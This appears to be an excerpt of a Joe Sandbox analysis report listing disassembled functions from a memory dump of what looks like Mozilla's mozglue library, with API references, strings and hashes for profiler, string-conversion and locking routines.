Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: fb5af6a7d0f98cbf0c32ae2b79c873c011f35452786ba3141f9476f5a39b8753
Instruction ID: b9d987a83adc0d71865b011247b9fcafa4dab7b01e02c7fa1cfaa236c808266a
Opcode Fuzzy Hash: fb5af6a7d0f98cbf0c32ae2b79c873c011f35452786ba3141f9476f5a39b8753
Instruction Fuzzy Hash: 7A51E571A04B028FD368CF28C4A461AB7E5EB99704F558A2EE599D7B84D730E840CF91

Function 6CA04630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CA04721

Strings

profiler-paused, xrefs: 6CA046E4
-%llu, xrefs: 6CA04733
., xrefs: 6CA0476A

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: __aulldiv
String ID: -%llu$.$profiler-paused
API String ID: 3732870572-2661126502
Opcode ID: 03c52101ccc5f82c7f6d9d9f983cd9537308809bd6e8e4014f08f69490d2af08
Instruction ID: 13f0469e6e4fc546a93713d37ac42e18f7724337feca5d81b524a32770df0695
Opcode Fuzzy Hash: 03c52101ccc5f82c7f6d9d9f983cd9537308809bd6e8e4014f08f69490d2af08
Instruction Fuzzy Hash: 5B416871F087189FCB08DF78E85119EBBE5EFA5388F14862EE84997B41EB309885C741

Function 6CA29830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6CA2985D
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6CA2987D
MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6CA298DE

Strings

ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6CA298D9

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Printf$Target@mozilla@@$?vprint@Crash
String ID: ElementAt(aIndex = %zu, aLength = %zu)
API String ID: 1778083764-3290996778
Opcode ID: 30899042abb43805b73675b26b0a6189a9812ecaff08f17cb4b5c46f2df81890
Instruction ID: ba35fac7c28661d4ac7f681d6a8b74f5ffdde1b3e7555a0b75016ae22ebb96b8
Opcode Fuzzy Hash: 30899042abb43805b73675b26b0a6189a9812ecaff08f17cb4b5c46f2df81890
Instruction Fuzzy Hash: AE313571A002189FDF14AF59DC149EE77B9DFA8718F04842DEA0ADBB40CB349905CBE1

Function 6CA046E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CA04721

Part of subcall function 6C9B4410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C9F3EBD,00000017,?,00000000,?,6C9F3EBD,?,?,6C9B42D2), ref: 6C9B4444

Strings

profiler-paused, xrefs: 6CA046E4
-%llu, xrefs: 6CA04733
., xrefs: 6CA0476A

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: __aulldiv__stdio_common_vsprintf
String ID: -%llu$.$profiler-paused
API String ID: 680628322-2661126502
Opcode ID: d6cd85eb84bd433002725bc1c14f1c9cc2d91fd0ccd38e0e6bc64ddd7ce72198
Instruction ID: ddca7993d8361e93819fdb26fbdd4ca46e4956023a32a48e1eafe525ade2ac51
Opcode Fuzzy Hash: d6cd85eb84bd433002725bc1c14f1c9cc2d91fd0ccd38e0e6bc64ddd7ce72198
Instruction Fuzzy Hash: 2D314A71F043184BCB0CCF6CE89129EBBE6ABA8318F18813DE8059B741E774D8448B90

Function 6CA0B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9B4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C9F3EBD,6C9F3EBD,00000000), ref: 6C9B42A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CA0B127), ref: 6CA0B463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CA0B4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6CA0B4E4

Strings

pid:, xrefs: 6CA0B4DE

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: 364a477578e27e08ed277c7ccc15e435df91a99824a26dfb729f604b42425acd
Instruction ID: b43d32309bb1fcb14cb9fd9cb2800969cbaa09607f8275892857c5d0f1516694
Opcode Fuzzy Hash: 364a477578e27e08ed277c7ccc15e435df91a99824a26dfb729f604b42425acd
Instruction Fuzzy Hash: E3312631B012159BCB10DFA9F980AEEB775FF0534CF180629D802A7A41D732E985CBA1

Function 6C9FE550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C9FE577
AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FE584
ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FE5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C9FE8A6

Strings

MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C9FE722, 6C9FE750, 6C9FE7A2
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C9FE826, 6C9FE850
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C9FE655
MOZ_PROFILER_STARTUP, xrefs: 6C9FE5A1, 6C9FE5CC, 6C9FE5FF, 6C9FE62A
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C9FE777

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: 8180e7768235ebc36f1010edfb6f041773aa200c478f88b8418f9129eca83d83
Instruction ID: 83e1efda8eac95fd5d7c1cc836a55ce98b6e13578eaf6955e8843d2a4be1951b
Opcode Fuzzy Hash: 8180e7768235ebc36f1010edfb6f041773aa200c478f88b8418f9129eca83d83
Instruction Fuzzy Hash: 8411CE31610359DFCB149F18CC58A69BBB8FB89728F00865DF89AC7650C770A846CB91

Function 6CA00C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CA00CD5

Part of subcall function 6C9EF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C9EF9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CA00D40
free.MOZGLUE ref: 6CA00DCB

Part of subcall function 6C9D5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C9D5EDB
Part of subcall function 6C9D5E90: memset.VCRUNTIME140(6CA17765,000000E5,55CCCCCC), ref: 6C9D5F27
Part of subcall function 6C9D5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C9D5FB2

free.MOZGLUE ref: 6CA00DDD
free.MOZGLUE ref: 6CA00DF2

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: 00bf111cf1c628ae21a94c66fa03c7ac6117619ddd5f90ba89e6beab9f26cce5
Instruction ID: 04a4a3f58a32366d9ebe0a7bc1b46d0e6db2da516694d2899d535d641ee9ea45
Opcode Fuzzy Hash: 00bf111cf1c628ae21a94c66fa03c7ac6117619ddd5f90ba89e6beab9f26cce5
Instruction Fuzzy Hash: ED414975A087809BD320DF29C08079EFBE5BFD9758F158A2EE8D887710D770A484CB92

Function 6C9F0800 Relevance: 6.3, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9F0838
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C9F084C
EnterCriticalSection.KERNEL32(?), ref: 6C9F08AF
LeaveCriticalSection.KERNEL32(?), ref: 6C9F08BD
LeaveCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9F08D5

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset
String ID:
API String ID: 837921583-0
Opcode ID: c2dee3af56a84f042b914f71a8e739f616754a93fbc43490ffd6fa75ffc01aa0
Instruction ID: d7f61ab4afd45d5d92e4941b4e723c6c05d2139cdfd1775557f77defecf41ead
Opcode Fuzzy Hash: c2dee3af56a84f042b914f71a8e739f616754a93fbc43490ffd6fa75ffc01aa0
Instruction Fuzzy Hash: 8B21C130B0534E9BEB04CF699C58BAA737DBF45708F544568D51DE7A40DB32E8068BD0

Function 6CA0CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C9FDA31,00100000,?,?,00000000,?), ref: 6CA0CDA4

Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26

Part of subcall function 6CA0D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6CA0CDBA,00100000,?,00000000,?,6C9FDA31,00100000,?,?,00000000,?), ref: 6CA0D158
Part of subcall function 6CA0D130: InitializeConditionVariable.KERNEL32(00000098,?,6CA0CDBA,00100000,?,00000000,?,6C9FDA31,00100000,?,?,00000000,?), ref: 6CA0D177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C9FDA31,00100000,?,?,00000000,?), ref: 6CA0CDC4

Part of subcall function 6CA07480: ReleaseSRWLockExclusive.KERNEL32(?,6CA115FC,?,?,?,?,6CA115FC,?), ref: 6CA074EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C9FDA31,00100000,?,?,00000000,?), ref: 6CA0CECC

Part of subcall function 6C9CCA10: mozalloc_abort.MOZGLUE(?), ref: 6C9CCAA2

Part of subcall function 6C9FCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6CA0CEEA,?,?,?,?,00000000,?,6C9FDA31,00100000,?,?,00000000), ref: 6C9FCB57
Part of subcall function 6C9FCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C9FCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6CA0CEEA,?,?), ref: 6C9FCBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C9FDA31,00100000,?,?,00000000,?), ref: 6CA0D058

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: e6b38bb1d0407c13ba12abbbf231b5293e790e4dc96299bad09ad16af909bf89
Instruction ID: 65e54324bf4ac42dc9caa46e0732946fc5d4c6135d5ddaae4a74ffeca9add462
Opcode Fuzzy Hash: e6b38bb1d0407c13ba12abbbf231b5293e790e4dc96299bad09ad16af909bf89
Instruction Fuzzy Hash: 07D19F71B04B069FD708CF28D480799F7E1BF98348F05862DD85987712EB31E9A5CB92

Function 6C9C1720 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C9C17B2
memset.VCRUNTIME140(?,00000000,?,?), ref: 6C9C18EE
free.MOZGLUE(?), ref: 6C9C1911
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9C194C

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
String ID:
API String ID: 3725304770-0
Opcode ID: 28d351d31fe3d6d151821d03fd677d4a8afa90cc797d352383b32db9d3a9f7bf
Instruction ID: 2cde8c1a5d0a424f70b16e77f0f0362f9cf10adeb654802890ecbd7402759eaa
Opcode Fuzzy Hash: 28d351d31fe3d6d151821d03fd677d4a8afa90cc797d352383b32db9d3a9f7bf
Instruction Fuzzy Hash: 3781CF70A142069FDB08CF68D8D49AEBBB5FF8A314F04856CE805AB750D730E954CBA7

Function 6C9D5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C9D5D40
EnterCriticalSection.KERNEL32(6CA3F688), ref: 6C9D5D67
__aulldiv.LIBCMT ref: 6C9D5DB4
LeaveCriticalSection.KERNEL32(6CA3F688), ref: 6C9D5DED

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: c2a164c8fbb7b9964596b899bfaba50edfcc39c5847c8d31c674e66daeb394ca
Instruction ID: a09e7feb18cf790dbb8e1719a2514e5af75ff199bb26b4a138c90d2fedd6ed8f
Opcode Fuzzy Hash: c2a164c8fbb7b9964596b899bfaba50edfcc39c5847c8d31c674e66daeb394ca
Instruction Fuzzy Hash: 56515EB1E006568FCF18CF68CD54AAEBBB2FB95304F1A865DC815B7750C730A946CB90

Function 6C9BCDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9BCEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C9BCEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C9BCF4E

Strings

0, xrefs: 6C9BCF30

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: 64cee92bde6081aa2619c50463ae44c0b5554298f882bce379497ade4c64a639
Instruction ID: fafa9a98d5dfc62e19a6b6ed369b6f7c0524686cf4fbffcd7ffc1e4ad0fd15f1
Opcode Fuzzy Hash: 64cee92bde6081aa2619c50463ae44c0b5554298f882bce379497ade4c64a639
Instruction Fuzzy Hash: 8051F275A0021ACFCB00CF18C890A9AFBB5EF99304F198599E8595F351D735ED06CBE0

Function 6CA177D0 Relevance: 6.1, APIs: 4, Instructions: 113stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA177FA
?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6CA17829

Part of subcall function 6C9ECC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C9B31A7), ref: 6C9ECC45
Part of subcall function 6C9ECC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C9B31A7), ref: 6C9ECC4E

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CA1789F
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CA178CF

Part of subcall function 6C9B4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C9B4E5A
Part of subcall function 6C9B4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C9B4E97

Part of subcall function 6C9B4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C9F3EBD,6C9F3EBD,00000000), ref: 6C9B42A9

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
String ID:
API String ID: 2525797420-0
Opcode ID: d0655474ae4551b73cd5989cc88712875748ae0daccd7b5de624cf8849f974d5
Instruction ID: f8723535002fd257b131cd0ad640633b85adeecc48501ea3860dad976ac0632b
Opcode Fuzzy Hash: d0655474ae4551b73cd5989cc88712875748ae0daccd7b5de624cf8849f974d5
Instruction Fuzzy Hash: 5F419F719087469BD300DF29C88056BFBF4FFDA254F204A2EE4A987641DB30D999CBD2

Function 6C9F6470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C9F82BC,?,?), ref: 6C9F649B

Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9F64A9

Part of subcall function 6C9EFA80: GetCurrentThreadId.KERNEL32 ref: 6C9EFA8D
Part of subcall function 6C9EFA80: AcquireSRWLockExclusive.KERNEL32(6CA3F448), ref: 6C9EFA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9F653F
free.MOZGLUE(?), ref: 6C9F655A

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: be38996476576fefb123ba15209c1846ba4d1c559ebd55e592df713ed55ad484
Instruction ID: 0c8709a78fed17a26c74fb05994d698dfd7a4567e9e2420e989efb6214ca6fba
Opcode Fuzzy Hash: be38996476576fefb123ba15209c1846ba4d1c559ebd55e592df713ed55ad484
Instruction Fuzzy Hash: 4C31A2B5A043159FD704DF14D884A9EBBF4FF99318F00842EE85A97741DB30E919CB92

Function 6C9EFF60 Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6CA0D019,?,?,?,?,?,00000000,?,6C9FDA31,00100000,?), ref: 6C9EFFD3
memcpy.VCRUNTIME140(00000000,?,?,?,6CA0D019,?,?,?,?,?,00000000,?,6C9FDA31,00100000,?,?), ref: 6C9EFFF5
free.MOZGLUE(?,?,?,?,?,6CA0D019,?,?,?,?,?,00000000,?,6C9FDA31,00100000,?), ref: 6C9F001B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6CA0D019,?,?,?,?,?,00000000,?,6C9FDA31,00100000,?,?), ref: 6C9F002A

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 826125452-0
Opcode ID: a66621e3dd0043785e743bac76800e63d22d2afb58be80af603dd309f70a3b07
Instruction ID: ac786c4de606d7da259e2922950c26f8bc1f5bc1dcc96cec2e2022d5bbea7359
Opcode Fuzzy Hash: a66621e3dd0043785e743bac76800e63d22d2afb58be80af603dd309f70a3b07
Instruction Fuzzy Hash: 352108B2A006165BD7189E78AC944AFB7BAEF993243250739D425D7780EA30DD1187D1

Function 6C9CB4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C9CB4F5
AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9CB502
ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9CB542
free.MOZGLUE(?), ref: 6C9CB578

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
